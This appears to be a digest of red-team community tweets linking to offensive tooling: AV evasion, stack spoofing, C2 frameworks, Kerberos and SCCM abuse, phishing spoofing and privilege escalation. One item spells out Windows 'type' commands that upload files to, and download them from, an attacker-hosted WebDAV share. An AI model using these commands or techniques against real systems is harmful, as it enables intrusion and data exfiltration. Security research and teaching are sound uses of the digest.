😈 [ lpha3ch0, Steve Campbell ]
Pywerview in the Kali repo is outdated and broken so I created a Dockerfile to simplify installing in an isolated container. Also submitted a pull request to add it to the repo: https://t.co/wt9XbHtcDY
🔗 https://github.com/the-useless-one/pywerview/pull/54
🐥 [ tweet ]
😈 [ theluemmel, ADCluemmelSec ]
Are you also tired of
"This setting is managed by your administrator or organization"
messages, preventing you from altering settings, although you are admin?
Fear no more, I got you covered - well at least partially:
AV
FW
DeviceGuard
Edge
FF
https://t.co/ZHf1QoMSfo
🔗 https://gist.github.com/LuemmelSec/20e2b6429eccf0bac91ac6f17bc98c87
🐥 [ tweet ]
😈 [ Cneelis, Cn33liz ]
It is #BOFFriday again!
Today's release:
> Klist, a BOF implementation to display Kerberos tickets.
> Psk, display loaded kernel modules and summarise installed security products.
Check out the @OutflankNL C2-Tool-Collection repo: https://t.co/Wq1obZlEtk
🔗 https://github.com/outflanknl/C2-Tool-Collection
🐥 [ tweet ]
😈 [ chvancooten, Cas van Cooten ]
I have to say, using #ChatGPT as a Telegram bot works impressively well
(Script: https://t.co/vxDGzGaa9K)
🔗 https://github.com/m1guelpf/chatgpt-telegram
🐥 [ tweet ]
😈 [ KlezVirus, d3adc0de ]
[BLOG POST] And as promised, this is a brief article describing the technique used within SilentMoonwalk. Might be a good weekend read!
https://t.co/FUnW2Ca6VP
🔗 https://klezvirus.github.io/RedTeaming/AV_Evasion/StackSpoofing/
🐥 [ tweet ]
😈 [ x86matthew, x86matthew ]
StealthHook - A method for hooking functions without modifying memory protection.
This tool automatically discovers writable global pointers/vtable entries that are nested within the target function, enabling stealthy function hooking and interception.
https://t.co/vdrNVTdMnd
🔗 https://www.x86matthew.com/view_post?id=stealth_hook
🐥 [ tweet ]
😈 [ ippsec, ippsec ]
#HackTheBox Outdated video is up! The box features Follina, Shadow Credentials, and some lateral movement by injecting a malicious Windows update with SharpWSUS.
https://t.co/od5IlQk33s
🔗 https://youtu.be/TR132R1h3Ds
🐥 [ tweet ]
😈 [ Mr_0rng, mr.0range ]
The Windows type command has download/upload functionality
1️⃣ Host a WebDAV server with anonymous r/w access
2️⃣ Download: type \\webdav-ip\folder\file.ext > C:\Path\file.ext
3️⃣ Upload: type C:\Path\file.ext > \\webdav-ip\folder\file.ext
#lolbin #redteam
(Bonus ADS 😆)
🐥 [ tweet ]
😈 [ netbiosX, netbiosX 🦄 ]
DynamicDotNet - A collection of various and sundry code snippets that leverage .NET dynamic tradecraft by @bohops https://t.co/G7aW8NIUXw #redteam
🔗 https://github.com/bohops/DynamicDotNet
🐥 [ tweet ]
😈 [ m2rc_p, marc ]
My page about AV Evasion for HackTricks just got merged!
Tried to include mostly methodology of modern techniques and also included some practical examples.
· Generic Evasion Methodology
· Dll Sideloading
· AMSI
· SmartScreen & MoTW
· C# Reflection
https://t.co/xYAUtLJRDj
🔗 https://book.hacktricks.xyz/windows-hardening/av-bypass
🐥 [ tweet ]
Forwarded from Внутрянка
An article about shadow credentials
Ardent101
Kerberos for the penetration testing specialist. Part 6. PKINIT
The article covers the internals of one of the Kerberos protocol extensions, PKINIT. After a theoretical introduction, it walks through the attack techniques related to this extension, in particular Shadow Credentials and UnPAC the hash.
In short, …
😈 [ c2_matrix, C2 Matrix | #C2Matrix ]
Thanks to those that have reached out to add C2s to #C2Matrix
- RedditC2 from @kleiton0x7e @t4tch3r_: https://t.co/TIQ7xJyTmb
- RedbloodC2: https://t.co/YK3FuwpFzB
Remember anyone can contribute: https://t.co/sG8nRGxKmg
Golden source is Google Sheet: https://t.co/wy6vaeeKG5
🔗 https://github.com/kleiton0x00/RedditC2
🔗 https://github.com/kira2040k/RedbloodC2
🔗 https://howto.thec2matrix.com/contribute
🔗 https://docs.google.com/spreadsheets/d/1b4mUxa6cDQuTV2BPC6aA-GR4zGZi0ooPYtBe4IgPsSc/edit#gid=0
🐥 [ tweet ]
😈 [ r3dy__, Royce Davis ]
Here’s some installation instructions that don’t suck. More to come!
https://t.co/hEOp4NUsTB
🔗 https://realhax.gitbook.io/capsulecorp-pentest/setup/windows
🐥 [ tweet ]
This is the infrastructure lab from here, by the way: https://livebook.manning.com/book/penetrating-enterprise-networks (decent generic material on internal pentests)
😈 [ Flangvik, Melvin langvik ]
Updated SharpCollection! Snaffler @mikeloss, Whisker @elad_shamir and PassTheCert @AlmondOffSec have been added
https://t.co/2l3oQhZLpk
🔗 https://github.com/Flangvik/SharpCollection
🐥 [ tweet ]
😈 [ _nwodtuhs, Charlie Bromberg “Shutdown” ]
Thank you @BlWasp_ for adding Active Directory's SCCM / MECM abuse to https://t.co/L1mByz3R9Z
🔗 https://www.thehacker.recipes/ad/movement/sccm-mecm
🐥 [ tweet ]
😈 [ chompie1337, chompie ]
Demonstrating CVE-2022-37958 RCE Vuln. Reachable via any Windows application protocol that authenticates. Yes, that means RDP, SMB and many more. Please patch this one, it's serious!
https://t.co/ikOrTvQIJs
🔗 https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/
🐥 [ tweet ]
😈 [ pdiscoveryio, ProjectDiscovery.io ]
Automating @pdnuclei with JupiterOne
https://t.co/Y7lbt6HISP
#hackwithautomation
🔗 https://www.jupiterone.com/blog/automating-nuclei-with-jupiterone/
🐥 [ tweet ]
😈 [ 424f424f, rvrsh3ll ]
Ok fellow phishers. @Microsoft keeps harassing me via email to correct my blog post. How many of you have had success spoofing with this technique this last year? Time for them to fix this?
https://t.co/TTiUEbZhpI
🔗 https://www.blackhillsinfosec.com/spoofing-microsoft-365-like-its-1995/
🐥 [ tweet ]
😈 [ 404death, sailay(valen) ]
I just created the tool which can help to get NT AUTHORITY\SYSTEM from arbitrary directory creation bugs.
https://t.co/Mcv4HH2olT
🔗 https://github.com/binderlabs/DirCreate2System
🐥 [ tweet ]